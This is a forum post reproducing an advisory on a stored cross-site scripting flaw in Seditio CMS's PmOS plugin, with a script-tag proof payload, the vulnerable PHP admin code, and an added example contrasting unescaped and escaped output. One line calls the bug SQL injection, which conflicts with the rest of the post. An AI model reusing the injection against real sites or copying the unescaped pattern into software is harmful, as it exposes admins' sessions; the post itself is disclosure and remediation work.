  https://seditio.com.tr/eski1/forums.php?m=posts&q=1884
Author: Kaan, Posted: 2012-04-12 16:59 GMT.
Seditio CMS PmOS Plugin Multiple HTML Injection Vulnerabilities

An SQL injection vulnerability has been reported in the PM reading plugin. For this reason, do not use the plugin at the link given below.
https://seditio.com.tr/eski1/sedi.....-d46.html

Reported at:
http://www.securityfocus.com/bid.....eferences

Exploit
Attackers can use a browser to exploit these issues.

Solution:
Currently we are not aware of any vendor-supplied patches.

Discussion
PmOS plugin for Seditio CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible.

PmOS - Pm Okuma Sistemi plugin for Seditio CMS suffers from a cross site scripting vulnerability.

Code:
============================================================================
Vulnerable Software: PmOS - Pm Okuma Sistemi [plugin for Seditio CMS].
https://seditio.com.tr/eski1/datas/users/1-pmoku.rar (MD5 SUM: 88235c2b4b0613bff87545d2d887f042 *1-pmoku.rar)
https://seditio.com.tr/eski1/seditio-pm-okuma-eklentisi-d46.html
============================================================================
About Software:
PmOS - Pm Okuma Sistemi [plugin for Seditio CMS]
gives administrators the ability to read other users' PMs (private messages)
============================================================================
Tested:
With: Seditio 165

*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
============================================================================
Vuln Desc:
Due to insufficient sanitization, this plugin is prone to a Cross Site Scripting vulnerability (persistent Cross Site Scripting).
============================================================================

No sanitization is applied when fetching data from the database.
And thanks to Seditio CMS again! It stores the private message body in the database without any sanitization:

===========================================================================
mysql> select * from sed_pm \G
*************************** 1. row ***************************
        pm_id: 6
     pm_state: 0
      pm_date: 1334009749
pm_fromuserid: 1
  pm_fromuser: admin
  pm_touserid: 1
     pm_title: <script>alert(1);</script>
      pm_text: <script>alert(2);</script>
1 row in set (0.00 sec)

mysql>
===========================================================================

Because it trusts this data, the pmoku plugin is vulnerable to XSS.
Vulnerable code section (from the bottom: $pm_text = $row['pm_text']; is output unsanitized)
//plugins/pmoku/pmoku.admin.php
----------------------------------------Snip ------------------------------------
$sql = sed_sql_query("SELECT * FROM sed_pm ORDER by pm_date DESC LIMIT 0,50");

$plugin_body .= "<h4>".$L['editdeleteentries']." :</h4>";
$plugin_body .= "<table class=\"cells\"><tr>";
$plugin_body .= "<td class=\"coltop\">".$L['Delete']."</td>";
$plugin_body .= "<td class=\"coltop\">Tarih</td>";
$plugin_body .= "<td class=\"coltop\">Gönderen</td>";
$plugin_body .= "<td class=\"coltop\">Konu</td>";
$plugin_body .= "<td class=\"coltop\">Mesaj</td>";
$plugin_body .= "<td class=\"coltop\">Alan</td>";
$plugin_body .= "</tr>";

while ($row = sed_sql_fetcharray($sql))
  {
  // Raw database values; pm_title and pm_text are user-controlled and never escaped
  $pm_id = $row['pm_id'];
  $pm_date = @date($cfg['dateformat'], $row['pm_date'] + $usr['timezone'] * 3600);
  $pm_fromuser = $row['pm_fromuser'];
  $pm_title = $row['pm_title'];
  $pm_text = $row['pm_text'];
  $pm_touserid = $row['pm_touserid'];
  $plugin_body .= "<form id=\"saveallowlist_".$allowlist_id."\" action=\"admin.php?m=tools&p=adminallow&a=update&id=".$allowlist_id."\" method=\"post\">";
  $plugin_body .= "<tr><td style=\"text-align:center;\">[<a href=\"admin.php?m=tools&p=pmoku&a=delete&id=".$pm_id."&".sed_xg()."\">x</a>]</td>";
  $plugin_body .= "<td>$pm_date</td>";
  $plugin_body .= "<td>$pm_fromuser</td>";
  // XSS sinks: the stored title and message body are concatenated straight into the admin page's HTML
  $plugin_body .= "<td>$pm_title</td>";
  $plugin_body .= "<td>$pm_text</td>";
  $plugin_body .= "<td>$pm_touserid</td>";
  $plugin_body .= "<td><input type=\"submit\" class=\"submit\" value=\"".$L['Update']."\" /></td></tr></form>";
  }
$plugin_body .= "</table>";
------------------------------EOF Snip ------------------------------------
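The following is an added example, not code from the advisory or from the PmOS plugin. It renders the same table row two ways: a loop body that mirrors the plugin's unescaped concatenation, and a hardened version that escapes every database-sourced value at the point it is written into HTML, which is the fix regardless of what the CMS did when it stored the message. The sample row is constructed to match the sed_pm row quoted above; the helper name h() and the simplified date format are my own choices, not anything from Seditio.

```php
<?php
// Added example (not from the advisory or the PmOS plugin).
// Constructed sample row, mirroring the sed_pm row quoted in the advisory.
$row = [
    'pm_id'       => 6,
    'pm_date'     => 1334009749,
    'pm_fromuser' => 'admin',
    'pm_title'    => '<script>alert(1);</script>',
    'pm_text'     => '<script>alert(2);</script>',
    'pm_touserid' => 1,
];

// Escape a value for an HTML text node or a double-quoted attribute.
// ENT_QUOTES also encodes single quotes; UTF-8 so multi-byte input is handled.
// (Helper name is an assumption for this example, not a Seditio function.)
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Mirrors the plugin's loop body: database values are concatenated into markup
// unchanged, so a stored <script> tag becomes live script in the admin's browser.
// Date formatting is simplified compared to the plugin's $cfg['dateformat'] call.
function render_row_vulnerable(array $row): string
{
    $out  = "<tr>";
    $out .= "<td>" . date('Y-m-d H:i', $row['pm_date']) . "</td>";
    $out .= "<td>{$row['pm_fromuser']}</td>";
    $out .= "<td>{$row['pm_title']}</td>";
    $out .= "<td>{$row['pm_text']}</td>";
    $out .= "<td>{$row['pm_touserid']}</td>";
    return $out . "</tr>";
}

// Hardened version: every string that came from the database is escaped as it
// is written into HTML. Output-time escaping is the right place for this check
// even if the CMS starts sanitizing on input later.
function render_row_safe(array $row): string
{
    $out  = "<tr>";
    $out .= "<td>" . h(date('Y-m-d H:i', $row['pm_date'])) . "</td>";
    $out .= "<td>" . h($row['pm_fromuser']) . "</td>";
    $out .= "<td>" . h($row['pm_title']) . "</td>";
    $out .= "<td>" . h($row['pm_text']) . "</td>";
    $out .= "<td>" . h((string) $row['pm_touserid']) . "</td>";
    return $out . "</tr>";
}

// Quick check a reviewer can run over rendered output: a raw <script tag from
// the stored message must not survive into the page.
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$vuln = render_row_vulnerable($row);
$safe = render_row_safe($row);

echo "vulnerable: " . $vuln . PHP_EOL;
echo "hardened:   " . $safe . PHP_EOL;
echo "raw <script> in vulnerable output: " . var_export(contains_raw_script($vuln), true) . PHP_EOL;
echo "raw <script> in hardened output:   " . var_export(contains_raw_script($safe), true) . PHP_EOL;
```

Run it with `php example.php`. The vulnerable row contains the stored `<script>alert(2);</script>` verbatim, so contains_raw_script() returns true for it; the hardened row carries `&lt;script&gt;alert(2);&lt;/script&gt;` instead, so the check returns false and the browser shows the tag as text rather than executing it.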

Print screen:
http://s019.radikal.ru/i617/1204/b2/9c434fd50926.png
